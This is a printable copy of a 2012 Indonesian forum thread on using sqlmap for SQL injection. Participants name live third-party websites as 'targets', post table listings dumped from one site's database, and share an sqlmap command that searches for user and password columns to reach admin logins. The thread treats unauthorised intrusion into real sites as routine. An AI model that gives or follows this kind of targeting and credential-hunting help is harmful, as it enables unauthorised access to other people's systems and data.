Indonesian Back|Track Team
SQLi Sqlmap.py - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html)
+----- Thread: SQLi Sqlmap.py (/thread-713.html)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

ohh ane ngerti :
Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials).
Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:

pakek phpmyadmin via browser wkwkw

pantes ga ada lagi nampak pakek sqlmap
mungkin di urlnya dibikin url/phpmyadmin,masih kurang jelas si

RE: SQLi Sqlmap.py - fake666 - 03-23-2012

arghh masi belum ngarti ==
trus waktu kita masukin
select @@datadir;
/opt/lampp/var/mysql/
itu di terminal ato di web browser ya om??

RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

web browser,,tapi via php myadmin,,phpmyadmin itu aplikasi webnya dari webserver,,disana sebagai user interfacenya misal buat database buat table,,melakukan query dan sebagainya
coba deh install xampp,wamp,lamp salah satu dari 3 itu, ntar jalanin aja ,dbrowser ketik local host(apache2 matikan)
kalo ragu g usah aja Smile nanti malah ada error ,,kecuali pengen coba di vbox

RE: SQLi Sqlmap.py - fake666 - 03-23-2012

oh gitu ya..ok deh..
eh om ada lagi nih target http://ypc.or.id/?module=Forum&file_id=42
coba deh di liat2
hehe eh yg kemarin ko gak bisa login ya aneh ==

RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

itu lah aneh,,wkwkwk okok TKP om Smile

RE: SQLi Sqlmap.py - juicided - 03-23-2012

tanya bro, aku udah dapat database:
1. information_schema
2. web9db5

Tabelnya kaya'gini:

Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


Database: web9db5
[13 tables]
+--------------------+
| `-content_backup` |
| `-content_uk_back` |
| ausschreibungen |
| bildserien |
| bildserien_uk |
| content |
| content_fr |
| content_nl |
| content_uk |
| ergebnisse |
| fotografen |
| inhalttyp |
| medien |
+--------------------+

lha itu kok nggak ada tabel 'admin' atau 'user' ??,
nyariin'nya gimana?
tolong dibantu yaa...

RE: SQLi Sqlmap.py - fake666 - 03-23-2012

gimana om junior.riau18 bisa gak?
ane susah nih,,lelet amat..


RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

tambahin --search user,pasword
jadi sintaknya

sqlmap.py -u urltarget, -D namabd --search user,password

RE: SQLi Sqlmap.py - juicided - 03-24-2012

nggak ketemu bro.
ini site-nya: www.pills-project.eu/index.php?id=138
silahkan di-utek2

ane mau coba target yg laen dulu hehe

RE: SQLi Sqlmap.py - Junior Riau - 03-24-2012

site nya aja g punya halaman login om Tongue